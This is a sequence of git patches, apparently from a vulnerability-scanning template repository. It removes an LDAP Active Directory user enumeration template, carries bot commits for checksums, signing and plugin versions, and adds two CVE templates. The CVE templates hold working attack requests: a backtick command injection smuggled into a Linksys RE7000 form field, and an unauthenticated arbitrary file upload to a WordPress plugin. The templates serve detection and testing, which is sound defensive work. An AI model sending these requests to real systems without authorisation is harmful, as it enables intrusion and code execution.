14d2120d90..0000000000 --- a/javascript/enumeration/ldap/ldap-get-ad-users.yaml +++ /dev/null @@ -1,46 +0,0 @@ -id: ldap-get-ad-users -info: - name: LDAP Get Active Directory User - Enumeration - author: pussycat0x - severity: info - description: | - Retrieve users from Active Directory, where each user is represented by an ADObject. - reference: - - https://docs.projectdiscovery.io/templates/protocols/javascript/modules/ldap.ADObject - metadata: - max-request: 1 - shodan-query: ldap - tags: js,network,ldap,enum - -javascript: - - code: | - const ldap = require('nuclei/ldap'); - const cfg = new ldap.Config(); - cfg.Upgrade = true; - const client = ldap.Client(Host, Port, cfg); - const users = client.GetADUsers(); - const bytes = require('nuclei/bytes'); - const buffer = new bytes.Buffer(); - for (const user of users) { - buffer.WriteString("DistinguishedName: '" + user.DistinguishedName+ "' ,"); - buffer.WriteString("SAMAccountName: '" + user.SAMAccountName+ "' ,"); - buffer.WriteString("PWDLastSet: '" + user.PWDLastSet+ "' ,"); - buffer.WriteString("LastLogon: '" + user.LastLogon+ "' ,"); - buffer.WriteString("MemberOf: '" + user.MemberOf+ "' ,"); - buffer.WriteString("ServicePrincipalName: '" + user.ServicePrincipalName+ "' ,"); - } - Export(buffer.String()); - - args: - Host: "ldap://{{Host}}" - Port: 389 - - matchers: - - type: dsl - dsl: - - "success == true" - - extractors: - - type: dsl - dsl: - - response From 1d56a3368d56d56198247fca021f29df6e46c995 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Thu, 4 Jul 2024 13:54:11 +0000 Subject: [PATCH 0935/1841] Auto Generated New Template Addition List [Thu Jul 4 13:54:11 UTC 2024] :robot: --- .new-additions | 2 ++ 1 file changed, 2 insertions(+) diff --git a/.new-additions b/.new-additions index a213f185b7..a12e82131d 100644 --- a/.new-additions +++ b/.new-additions @@ -4,6 +4,7 @@ dast/vulnerabilities/injection/xinclude-injection.yaml http/cves/2020/CVE-2020-10189.yaml http/cves/2023/CVE-2023-3380.yaml http/cves/2023/CVE-2023-35156.yaml +http/cves/2023/CVE-2023-35160.yaml http/cves/2023/CVE-2023-41599.yaml http/cves/2023/CVE-2023-52251.yaml http/cves/2024/CVE-2024-27292.yaml @@ -48,3 +49,4 @@ http/vulnerabilities/other/azon-dominator-sqli.yaml http/vulnerabilities/other/bagisto-csti.yaml http/vulnerabilities/other/crocus-lfi.yaml http/vulnerabilities/other/sharp-printers-lfi.yaml +javascript/enumeration/ldap/ldap-metadata.yaml From 661d12011e36bb415b7005cccebe0fcee292876d Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 4 Jul 2024 13:54:26 +0000 Subject: [PATCH 0936/1841] Auto Generated Templates Checksum [Thu Jul 4 13:54:26 UTC 2024] :robot: --- templates-checksum.txt | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 9576d25e08..175ccccd1c 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -3183,7 +3183,7 @@ http/cves/2023/CVE-2023-34960.yaml:4e27c9bf1526aee4e168645550f2a85595b7df7a http/cves/2023/CVE-2023-34993.yaml:8b4deeb45e70bb7dca9012a7fceb9e954fe1f867 http/cves/2023/CVE-2023-35078.yaml:4986f8899e309eabfe7de47ac607fc17bc6e2306 http/cves/2023/CVE-2023-35082.yaml:37ad71a404ca250f882e69f45503631e001653a2 -http/cves/2023/CVE-2023-35156.yaml:4c05e9ff833b26629f5811e3ff20714d64a69db4 +http/cves/2023/CVE-2023-35156.yaml:72c2e061bd7264a8e88e39bed12978ba41608ad8 http/cves/2023/CVE-2023-35158.yaml:76d09942bb434d541e43eb224218c181af2a2f1f http/cves/2023/CVE-2023-35160.yaml:617c0e5dc36eebc71db8c30fa818ae0aebe662bd http/cves/2023/CVE-2023-35162.yaml:b3c53552dcd6e3ef5ee198684f10ef0eec25f283 @@ -8618,6 +8618,7 @@ javascript/detection/oracle-tns-listener.yaml:f55369203a5da17a5573fe29d9dc9ebd31 javascript/detection/samba-detect.yaml:542324589cb7b9d34305c339d12350105050f250 javascript/detection/ssh-auth-methods.yaml:7240dac7d7ee80f4aebf95f7ddf7a540874adf04 javascript/enumeration/checkpoint-firewall-enum.yaml:138f2fd977904d9c0b0ba4417077563babf22fbc +javascript/enumeration/ldap/ldap-metadata.yaml:43ceb0444c8984396929c504744c572f8b427a40 javascript/enumeration/minecraft-enum.yaml:86520064cf23ae09b9ce6a2ec23f29abaeb9eb5e javascript/enumeration/mysql/mysql-default-login.yaml:6b496745946bfc4fbb85cba1c438a9825d3b9450 javascript/enumeration/mysql/mysql-info.yaml:5ceb2e000a061946387f2c789f0f8c8088b2ca3e @@ -8840,7 +8841,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:bc82696bc2460252050b4d18e9b4ed46e544d041 +templates-checksum.txt:908c379aaa9061832c58f85b151fc36545b6a8de wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 32dfbf1dc85b45f036a4adcf3e3047b45524bbc4 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Thu, 4 Jul 2024 13:55:06 +0000 Subject: [PATCH 0937/1841] Syncing Templates --- .github/workflows/templates-sync.yml | 2 ++ 1 file changed, 2 insertions(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index 0098b74e8f..a1824de2c1 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -9,6 +9,7 @@ on: - 'http/cves/2020/CVE-2020-10189.yaml' - 'http/cves/2023/CVE-2023-3380.yaml' - 'http/cves/2023/CVE-2023-35156.yaml' + - 'http/cves/2023/CVE-2023-35160.yaml' - 'http/cves/2023/CVE-2023-41599.yaml' - 'http/cves/2023/CVE-2023-52251.yaml' - 'http/cves/2024/CVE-2024-27292.yaml' @@ -53,6 +54,7 @@ on: - 'http/vulnerabilities/other/bagisto-csti.yaml' - 'http/vulnerabilities/other/crocus-lfi.yaml' - 'http/vulnerabilities/other/sharp-printers-lfi.yaml' + - 'javascript/enumeration/ldap/ldap-metadata.yaml' workflow_dispatch: jobs: triggerRemoteWorkflow: From 9d032072a3b057b54256fdbb403308467817cab4 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 4 Jul 2024 13:56:02 +0000 Subject: [PATCH 0938/1841] Auto Template Signing [Thu Jul 4 13:56:02 UTC 2024] :robot: --- http/cves/2023/CVE-2023-35160.yaml | 1 + javascript/enumeration/ldap/ldap-metadata.yaml | 3 ++- 2 files changed, 3 insertions(+), 1 deletion(-) diff --git a/http/cves/2023/CVE-2023-35160.yaml b/http/cves/2023/CVE-2023-35160.yaml index 155afa4bae..b9c3fa8415 100644 --- a/http/cves/2023/CVE-2023-35160.yaml +++ b/http/cves/2023/CVE-2023-35160.yaml @@ -54,3 +54,4 @@ http: status: - 200 - 401 +# digest: 4a0a00473045022100de201adc6ad02ff55137ab13a350a43679a1cbac095f2de8b65eb814fa1b864a0220303809b36b78e2fa98a255a8eba7ad094ae57eac96e3d4d6712a03ed34d03f1c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/javascript/enumeration/ldap/ldap-metadata.yaml b/javascript/enumeration/ldap/ldap-metadata.yaml index b49b21dc39..c9f1fd8b63 100644 --- a/javascript/enumeration/ldap/ldap-metadata.yaml +++ b/javascript/enumeration/ldap/ldap-metadata.yaml @@ -39,4 +39,5 @@ javascript: - '"DefaultNamingContext: "+ .DefaultNamingContext' - '"DomainFunctionality: "+ .DomainFunctionality' - '"ForestFunctionality: " + .ForestFunctionality' - - '"DomainControllerFunctionality: "+ .DomainControllerFunctionality' \ No newline at end of file + - '"DomainControllerFunctionality: "+ .DomainControllerFunctionality' +# digest: 4a0a0047304502201a7f8d1aac1b3310c350f97cfc2da7ee0c35031a8c190f60cf53d13205487b94022100922fe954b1f34d7c2cebe82aacc313bf609ed3259c819b989e32c20fc4cf80e4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 20ad18ce2d43cfd03b8100f4663bb82ff1250ea0 Mon Sep 17 00:00:00 2001 From: Kazgangap Date: Thu, 4 Jul 2024 17:26:09 +0300 Subject: [PATCH 0939/1841] add CVE-2024-25852 --- http/cves/2024/CVE-2024-25852.yaml | 45 ++++++++++++++++++++++++++++++ 1 file changed, 45 insertions(+) create mode 100644 http/cves/2024/CVE-2024-25852.yaml diff --git a/http/cves/2024/CVE-2024-25852.yaml b/http/cves/2024/CVE-2024-25852.yaml new file mode 100644 index 0000000000..fe344bfd34 --- /dev/null +++ b/http/cves/2024/CVE-2024-25852.yaml @@ -0,0 +1,45 @@ +id: CVE-2024-25852 + +info: + name: Linksys RE7000 - Command Injection + author: securityforeveryone + severity: high + description: RE7000 is a new dual-band AC1900 wireless extender with seamless roaming function launched by Linksys. + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2024-25852 + - https://github.com/ZackSecurity/VulnerReport/blob/cve/Linksys/1.md + - https://immense-mirror-b42.notion.site/Linksys-RE7000-command-injection-vulnerability-c1a47abf5e8d4dd0934d20d77da930bd + classification: + epss-score: 0.00043 + epss-percentile: 0.0866 + metadata: + verified: true + max-request: 1 + vendor: Linksys + product: RE7000 + tags: cve,cve2024,unauth,injection +variables: + filename: "{{rand_base(5)}}" + +http: + - raw: + - | + PUT /goform/AccessControl HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + {"AccessPolicy":"0","AccessControlList":"`ps>/etc_ro/lighttpd/RE7000_www/{{filename}}.txt`"} + + - raw: + - | + GET /{{filename}}.txt HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: dsl + dsl: + - 'contains_all(body_1,"result","success")' + - 'contains_all(body_2,"PID","USER","VSZ","STAT","COMMAND")' + - 'status_code_1 == 200' + - 'status_code_2 == 200' + condition: and From 109b60f51e8fe3254429c3063d7e18b675da3e94 Mon Sep 17 00:00:00 2001 From: Kazgangap Date: Thu, 4 Jul 2024 20:46:01 +0300 Subject: [PATCH 0940/1841] add CVE-2024-5084 --- http/cves/2024/CVE-2024-5084.yaml | 68 +++++++++++++++++++++++++++++++ 1 file changed, 68 insertions(+) create mode 100644 http/cves/2024/CVE-2024-5084.yaml diff --git a/http/cves/2024/CVE-2024-5084.yaml b/http/cves/2024/CVE-2024-5084.yaml new file mode 100644 index 0000000000..ccef4b6663 --- /dev/null +++ b/http/cves/2024/CVE-2024-5084.yaml @@ -0,0 +1,68 @@ +id: CVE-2024-5084 + +info: + name: Hash Form <= 1.1.0 - Arbitrary File Upload + author: securityforeveryone + severity: critical + description: | + The Hash Form Drag & Drop Form Builder plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the 'file_upload_action' function in all versions up to, and including, 1.1.0. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected site's server which may make remote code execution possible. + remediation: Fixed in 1.1.1 + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2024-5084 + - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/hash-form/hash-form-drag-drop-form-builder-110-unauthenticated-arbitrary-file-upload-to-remote-code-execution + - https://github.com/WOOOOONG/CVE-2024-5084/blob/main/CVE-2024-5084_exploit.py + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2024-5084 + epss-score: 0.00063 + epss-percentile: 0.27036 + metadata: + verified: true + max-request: 1 + vendor: HashThemes + product: Hash Form + framework: wordpress + publicwww-query: "/wp-content/plugins/hash-form/" + tags: cve,cve2024,wp-plugin,wordpress,file-upload,rce + +variables: + filename: "{{rand_base(5)}}" + num: "{{rand_int(1000, 9999)}}" + +http: + - raw: + - | + GET / HTTP /1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + - | + POST /wp-admin/admin-ajax.php?action=hashform_file_upload_action&file_uploader_nonce={{nonce}}&allowedExtensions%5B0%5D=txt&sizeLimit=1048576&qqfile={{filename}}.txt HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + {{md5(num)}} + + - | + GET /wp-content/uploads/hashform/temp/{{filename}}.txt HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + matchers: + - type: dsl + dsl: + - 'contains_all(body_2,"success","true","url")' + - 'status_code_2 == 200' + - 'contains(body_3,"{{md5(num)}}")' + - 'status_code_3 == 200' + condition: and + + extractors: + - type: regex + name: nonce + part: body + group: 1 + regex: + - '"ajax_nounce":"([0-9a-z]+)","preview_img' + internal: true From 24f32b832faee876572ec212ef327f60c891068a Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 5 Jul 2024 00:19:09 +0000 Subject: [PATCH 0941/1841] Auto WordPress Plugins Update [Fri Jul 5 00:19:09 UTC 2024] :robot: --- helpers/wordpress/plugins/all-in-one-wp-migration.txt | 2 +- helpers/wordpress/plugins/astra-sites.txt | 2 +- helpers/wordpress/plugins/breeze.txt | 2 +- helpers/wordpress/plugins/gutenberg.txt | 2 +- helpers/wordpress/plugins/ultimate-addons-for-gutenberg.txt | 2 +- http/technologies/wordpress/plugins/ad-inserter.yaml | 1 - http/technologies/wordpress/plugins/add-to-any.yaml | 1 - http/technologies/wordpress/plugins/admin-menu-editor.yaml | 1 - http/technologies/wordpress/plugins/advanced-custom-fields.yaml | 1 - http/technologies/wordpress/plugins/akismet.yaml | 1 - http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml | 1 - .../technologies/wordpress/plugins/all-in-one-wp-migration.yaml | 1 - .../wordpress/plugins/all-in-one-wp-security-and-firewall.yaml | 1 - http/technologies/wordpress/plugins/amp.yaml | 1 - http/technologies/wordpress/plugins/antispam-bee.yaml | 1 - http/technologies/wordpress/plugins/astra-sites.yaml | 1 - http/technologies/wordpress/plugins/autoptimize.yaml | 1 - http/technologies/wordpress/plugins/backwpup.yaml | 1 - http/technologies/wordpress/plugins/better-search-replace.yaml | 1 - http/technologies/wordpress/plugins/better-wp-security.yaml | 1 - .../wordpress/plugins/black-studio-tinymce-widget.yaml | 1 - http/technologies/wordpress/plugins/breadcrumb-navxt.yaml | 1 - http/technologies/wordpress/plugins/breeze.yaml | 1 - http/technologies/wordpress/plugins/broken-link-checker.yaml | 1 - http/technologies/wordpress/plugins/chaty.yaml | 1 - .../wordpress/plugins/child-theme-configurator.yaml | 1 - http/technologies/wordpress/plugins/classic-editor.yaml | 1 - http/technologies/wordpress/plugins/classic-widgets.yaml | 1 - .../wordpress/plugins/click-to-chat-for-whatsapp.yaml | 1 - http/technologies/wordpress/plugins/cmb2.yaml | 1 - http/technologies/wordpress/plugins/coblocks.yaml | 1 - http/technologies/wordpress/plugins/code-snippets.yaml | 1 - http/technologies/wordpress/plugins/coming-soon.yaml | 1 - http/technologies/wordpress/plugins/complianz-gdpr.yaml | 1 - .../technologies/wordpress/plugins/contact-form-7-honeypot.yaml | 1 - http/technologies/wordpress/plugins/contact-form-7.yaml | 1 - http/technologies/wordpress/plugins/contact-form-cfdb7.yaml | 1 - http/technologies/wordpress/plugins/cookie-law-info.yaml | 1 - http/technologies/wordpress/plugins/cookie-notice.yaml | 1 - http/technologies/wordpress/plugins/copy-delete-posts.yaml | 1 - http/technologies/wordpress/plugins/creame-whatsapp-me.yaml | 1 - .../wordpress/plugins/creative-mail-by-constant-contact.yaml | 1 - http/technologies/wordpress/plugins/custom-css-js.yaml | 1 - http/technologies/wordpress/plugins/custom-fonts.yaml | 1 - http/technologies/wordpress/plugins/custom-post-type-ui.yaml | 1 - http/technologies/wordpress/plugins/disable-comments.yaml | 1 - http/technologies/wordpress/plugins/disable-gutenberg.yaml | 1 - http/technologies/wordpress/plugins/duplicate-page.yaml | 1 - http/technologies/wordpress/plugins/duplicate-post.yaml | 1 - http/technologies/wordpress/plugins/duplicator.yaml | 1 - .../wordpress/plugins/duracelltomi-google-tag-manager.yaml | 1 - http/technologies/wordpress/plugins/easy-table-of-contents.yaml | 1 - http/technologies/wordpress/plugins/easy-wp-smtp.yaml | 1 - http/technologies/wordpress/plugins/elementor.yaml | 1 - http/technologies/wordpress/plugins/elementskit-lite.yaml | 1 - http/technologies/wordpress/plugins/enable-media-replace.yaml | 1 - http/technologies/wordpress/plugins/envato-elements.yaml | 1 - .../wordpress/plugins/essential-addons-for-elementor-lite.yaml | 1 - http/technologies/wordpress/plugins/ewww-image-optimizer.yaml | 1 - .../wordpress/plugins/facebook-for-woocommerce.yaml | 1 - http/technologies/wordpress/plugins/fast-indexing-api.yaml | 1 - .../wordpress/plugins/favicon-by-realfavicongenerator.yaml | 1 - http/technologies/wordpress/plugins/flamingo.yaml | 1 - http/technologies/wordpress/plugins/fluentform.yaml | 1 - http/technologies/wordpress/plugins/font-awesome.yaml | 1 - .../wordpress/plugins/force-regenerate-thumbnails.yaml | 1 - http/technologies/wordpress/plugins/formidable.yaml | 1 - http/technologies/wordpress/plugins/forminator.yaml | 1 - http/technologies/wordpress/plugins/ga-google-analytics.yaml | 1 - http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml | 1 - .../wordpress/plugins/google-analytics-dashboard-for-wp.yaml | 1 - .../wordpress/plugins/google-analytics-for-wordpress.yaml | 1 - .../technologies/wordpress/plugins/google-listings-and-ads.yaml | 1 - http/technologies/wordpress/plugins/google-site-kit.yaml | 1 - .../wordpress/plugins/google-sitemap-generator.yaml | 1 - http/technologies/wordpress/plugins/gtranslate.yaml | 1 - http/technologies/wordpress/plugins/gutenberg.yaml | 1 - http/technologies/wordpress/plugins/happy-elementor-addons.yaml | 1 - .../wordpress/plugins/header-footer-code-manager.yaml | 1 - .../technologies/wordpress/plugins/header-footer-elementor.yaml | 1 - http/technologies/wordpress/plugins/header-footer.yaml | 1 - http/technologies/wordpress/plugins/health-check.yaml | 1 - http/technologies/wordpress/plugins/hello-dolly.yaml | 1 - http/technologies/wordpress/plugins/host-webfonts-local.yaml | 1 - http/technologies/wordpress/plugins/hostinger.yaml | 1 - http/technologies/wordpress/plugins/image-optimization.yaml | 1 - http/technologies/wordpress/plugins/imagify.yaml | 1 - http/technologies/wordpress/plugins/imsanity.yaml | 1 - .../wordpress/plugins/insert-headers-and-footers.yaml | 1 - http/technologies/wordpress/plugins/instagram-feed.yaml | 1 - .../wordpress/plugins/intuitive-custom-post-order.yaml | 1 - http/technologies/wordpress/plugins/jetpack-boost.yaml | 1 - http/technologies/wordpress/plugins/jetpack.yaml | 1 - http/technologies/wordpress/plugins/kadence-blocks.yaml | 1 - http/technologies/wordpress/plugins/kirki.yaml | 1 - http/technologies/wordpress/plugins/leadin.yaml | 1 - .../wordpress/plugins/limit-login-attempts-reloaded.yaml | 1 - http/technologies/wordpress/plugins/limit-login-attempts.yaml | 1 - http/technologies/wordpress/plugins/litespeed-cache.yaml | 1 - http/technologies/wordpress/plugins/loco-translate.yaml | 1 - http/technologies/wordpress/plugins/loginizer.yaml | 1 - .../wordpress/plugins/mailchimp-for-woocommerce.yaml | 1 - http/technologies/wordpress/plugins/mailchimp-for-wp.yaml | 1 - http/technologies/wordpress/plugins/mailpoet.yaml | 1 - http/technologies/wordpress/plugins/maintenance.yaml | 1 - http/technologies/wordpress/plugins/mainwp-child.yaml | 1 - http/technologies/wordpress/plugins/malcare-security.yaml | 1 - http/technologies/wordpress/plugins/megamenu.yaml | 1 - http/technologies/wordpress/plugins/members.yaml | 1 - http/technologies/wordpress/plugins/meta-box.yaml | 1 - http/technologies/wordpress/plugins/metform.yaml | 1 - http/technologies/wordpress/plugins/ml-slider.yaml | 1 - http/technologies/wordpress/plugins/newsletter.yaml | 1 - .../wordpress/plugins/nextend-facebook-connect.yaml | 1 - http/technologies/wordpress/plugins/nextgen-gallery.yaml | 1 - http/technologies/wordpress/plugins/ninja-forms.yaml | 1 - http/technologies/wordpress/plugins/ocean-extra.yaml | 1 - .../technologies/wordpress/plugins/official-facebook-pixel.yaml | 1 - http/technologies/wordpress/plugins/one-click-demo-import.yaml | 1 - http/technologies/wordpress/plugins/optinmonster.yaml | 1 - http/technologies/wordpress/plugins/otter-blocks.yaml | 1 - http/technologies/wordpress/plugins/password-protected.yaml | 1 - http/technologies/wordpress/plugins/pdf-embedder.yaml | 1 - .../wordpress/plugins/pinterest-for-woocommerce.yaml | 1 - http/technologies/wordpress/plugins/pixelyoursite.yaml | 1 - http/technologies/wordpress/plugins/polylang.yaml | 1 - http/technologies/wordpress/plugins/popup-maker.yaml | 1 - http/technologies/wordpress/plugins/post-smtp.yaml | 1 - http/technologies/wordpress/plugins/post-types-order.yaml | 1 - .../wordpress/plugins/premium-addons-for-elementor.yaml | 1 - http/technologies/wordpress/plugins/pretty-link.yaml | 1 - http/technologies/wordpress/plugins/really-simple-captcha.yaml | 1 - http/technologies/wordpress/plugins/really-simple-ssl.yaml | 1 - http/technologies/wordpress/plugins/redirection.yaml | 1 - http/technologies/wordpress/plugins/redux-framework.yaml | 1 - http/technologies/wordpress/plugins/regenerate-thumbnails.yaml | 1 - http/technologies/wordpress/plugins/royal-elementor-addons.yaml | 1 - http/technologies/wordpress/plugins/safe-svg.yaml | 1 - http/technologies/wordpress/plugins/seo-by-rank-math.yaml | 1 - http/technologies/wordpress/plugins/sg-cachepress.yaml | 1 - http/technologies/wordpress/plugins/sg-security.yaml | 1 - http/technologies/wordpress/plugins/shortcodes-ultimate.yaml | 1 - .../wordpress/plugins/shortpixel-image-optimiser.yaml | 1 - .../wordpress/plugins/simple-custom-post-order.yaml | 1 - http/technologies/wordpress/plugins/simple-history.yaml | 1 - http/technologies/wordpress/plugins/siteguard.yaml | 1 - http/technologies/wordpress/plugins/siteorigin-panels.yaml | 1 - http/technologies/wordpress/plugins/smart-slider-3.yaml | 1 - http/technologies/wordpress/plugins/so-widgets-bundle.yaml | 1 - .../wordpress/plugins/sticky-header-effects-for-elementor.yaml | 1 - .../wordpress/plugins/stops-core-theme-and-plugin-updates.yaml | 1 - http/technologies/wordpress/plugins/sucuri-scanner.yaml | 1 - http/technologies/wordpress/plugins/svg-support.yaml | 1 - http/technologies/wordpress/plugins/table-of-contents-plus.yaml | 1 - http/technologies/wordpress/plugins/tablepress.yaml | 1 - http/technologies/wordpress/plugins/taxonomy-terms-order.yaml | 1 - http/technologies/wordpress/plugins/templately.yaml | 1 - http/technologies/wordpress/plugins/the-events-calendar.yaml | 1 - http/technologies/wordpress/plugins/tinymce-advanced.yaml | 1 - .../wordpress/plugins/translatepress-multilingual.yaml | 1 - .../wordpress/plugins/ultimate-addons-for-gutenberg.yaml | 1 - .../technologies/wordpress/plugins/under-construction-page.yaml | 1 - http/technologies/wordpress/plugins/updraftplus.yaml | 1 - http/technologies/wordpress/plugins/user-role-editor.yaml | 1 - http/technologies/wordpress/plugins/w3-total-cache.yaml | 1 - .../wordpress/plugins/webp-converter-for-media.yaml | 1 - http/technologies/wordpress/plugins/webp-express.yaml | 1 - .../wordpress/plugins/widget-importer-exporter.yaml | 1 - .../wordpress/plugins/woo-cart-abandonment-recovery.yaml | 1 - .../wordpress/plugins/woo-checkout-field-editor-pro.yaml | 1 - http/technologies/wordpress/plugins/woo-variation-swatches.yaml | 1 - .../wordpress/plugins/woocommerce-gateway-stripe.yaml | 1 - .../wordpress/plugins/woocommerce-legacy-rest-api.yaml | 1 - http/technologies/wordpress/plugins/woocommerce-payments.yaml | 1 - .../wordpress/plugins/woocommerce-paypal-payments.yaml | 1 - .../plugins/woocommerce-pdf-invoices-packing-slips.yaml | 1 - http/technologies/wordpress/plugins/woocommerce-services.yaml | 1 - http/technologies/wordpress/plugins/woocommerce.yaml | 1 - http/technologies/wordpress/plugins/wordfence.yaml | 1 - http/technologies/wordpress/plugins/wordpress-importer.yaml | 1 - http/technologies/wordpress/plugins/wordpress-seo.yaml | 1 - http/technologies/wordpress/plugins/worker.yaml | 1 - http/technologies/wordpress/plugins/wp-fastest-cache.yaml | 1 - http/technologies/wordpress/plugins/wp-file-manager.yaml | 1 - http/technologies/wordpress/plugins/wp-google-maps.yaml | 1 - http/technologies/wordpress/plugins/wp-mail-smtp.yaml | 1 - http/technologies/wordpress/plugins/wp-maintenance-mode.yaml | 1 - http/technologies/wordpress/plugins/wp-migrate-db.yaml | 1 - http/technologies/wordpress/plugins/wp-multibyte-patch.yaml | 1 - http/technologies/wordpress/plugins/wp-optimize.yaml | 1 - http/technologies/wordpress/plugins/wp-pagenavi.yaml | 1 - http/technologies/wordpress/plugins/wp-reset.yaml | 1 - .../wordpress/plugins/wp-reviews-plugin-for-google.yaml | 1 - http/technologies/wordpress/plugins/wp-rollback.yaml | 1 - http/technologies/wordpress/plugins/wp-seopress.yaml | 1 - http/technologies/wordpress/plugins/wp-sitemap-page.yaml | 1 - http/technologies/wordpress/plugins/wp-smushit.yaml | 1 - http/technologies/wordpress/plugins/wp-statistics.yaml | 1 - http/technologies/wordpress/plugins/wp-super-cache.yaml | 1 - http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml | 1 - http/technologies/wordpress/plugins/wpcf7-redirect.yaml | 1 - http/technologies/wordpress/plugins/wpforms-lite.yaml | 1 - http/technologies/wordpress/plugins/wps-hide-login.yaml | 1 - http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml | 1 - .../wordpress/plugins/yith-woocommerce-wishlist.yaml | 1 - 205 files changed, 5 insertions(+), 205 deletions(-) diff --git a/helpers/wordpress/plugins/all-in-one-wp-migration.txt b/helpers/wordpress/plugins/all-in-one-wp-migration.txt index b0430803ec..e60da8bb9d 100644 --- a/helpers/wordpress/plugins/all-in-one-wp-migration.txt +++ b/helpers/wordpress/plugins/all-in-one-wp-migration.txt @@ -1 +1 @@ -7.83 \ No newline at end of file +7.84 \ No newline at end of file diff --git a/helpers/wordpress/plugins/astra-sites.txt b/helpers/wordpress/plugins/astra-sites.txt index bbdf097e50..64012886c3 100644 --- a/helpers/wordpress/plugins/astra-sites.txt +++ b/helpers/wordpress/plugins/astra-sites.txt @@ -1 +1 @@ -4.3.5 \ No newline at end of file +4.3.6 \ No newline at end of file diff --git a/helpers/wordpress/plugins/breeze.txt b/helpers/wordpress/plugins/breeze.txt index 41bb57bd66..46ca28dc80 100644 --- a/helpers/wordpress/plugins/breeze.txt +++ b/helpers/wordpress/plugins/breeze.txt @@ -1 +1 @@ -2.1.10 \ No newline at end of file +2.1.11 \ No newline at end of file diff --git a/helpers/wordpress/plugins/gutenberg.txt b/helpers/wordpress/plugins/gutenberg.txt index 04a1609562..d61eff48a6 100644 --- a/helpers/wordpress/plugins/gutenberg.txt +++ b/helpers/wordpress/plugins/gutenberg.txt @@ -1 +1 @@ -18.7.0 \ No newline at end of file +18.7.1 \ No newline at end of file diff --git a/helpers/wordpress/plugins/ultimate-addons-for-gutenberg.txt b/helpers/wordpress/plugins/ultimate-addons-for-gutenberg.txt index e02b2e809e..706739ee87 100644 --- a/helpers/wordpress/plugins/ultimate-addons-for-gutenberg.txt +++ b/helpers/wordpress/plugins/ultimate-addons-for-gutenberg.txt @@ -1 +1 @@ -2.13.8 \ No newline at end of file +2.13.9 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ad-inserter.yaml b/http/technologies/wordpress/plugins/ad-inserter.yaml index 4ea024eb60..3fd2256749 100644 --- a/http/technologies/wordpress/plugins/ad-inserter.yaml +++ b/http/technologies/wordpress/plugins/ad-inserter.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502205f05206783188c54dc0cc8bac49757430473e73578d0cfe1847b8bba26b02639022100c274746344a8a5787a9cafff574745182577de6affb1715b0ea8a3f166bfa332:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/add-to-any.yaml b/http/technologies/wordpress/plugins/add-to-any.yaml index c239885338..6a0d344b63 100644 --- a/http/technologies/wordpress/plugins/add-to-any.yaml +++ b/http/technologies/wordpress/plugins/add-to-any.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100ef832f58b4d5b371d998884eff933195bd61db8c52b92ce76961e333fe4072b00220233972cc00d8e6e78cc52132086ecbb8f11afb6e367c1069ef6d01d4dbc5be34:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/admin-menu-editor.yaml b/http/technologies/wordpress/plugins/admin-menu-editor.yaml index 0d1ad67cd2..6fb5080bc8 100644 --- a/http/technologies/wordpress/plugins/admin-menu-editor.yaml +++ b/http/technologies/wordpress/plugins/admin-menu-editor.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502210086fcb1b231bfd4e7aba807991c371d9ee7cfb51276814ff0f269ab15039e62d002206cadbf8efaa306ecad28873815b86d70020da12de58ddd9e164e51473aadf09d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/advanced-custom-fields.yaml b/http/technologies/wordpress/plugins/advanced-custom-fields.yaml index 5a9ea90aa4..cddbb4bb2e 100644 --- a/http/technologies/wordpress/plugins/advanced-custom-fields.yaml +++ b/http/technologies/wordpress/plugins/advanced-custom-fields.yaml @@ -46,4 +46,3 @@ http: part: body 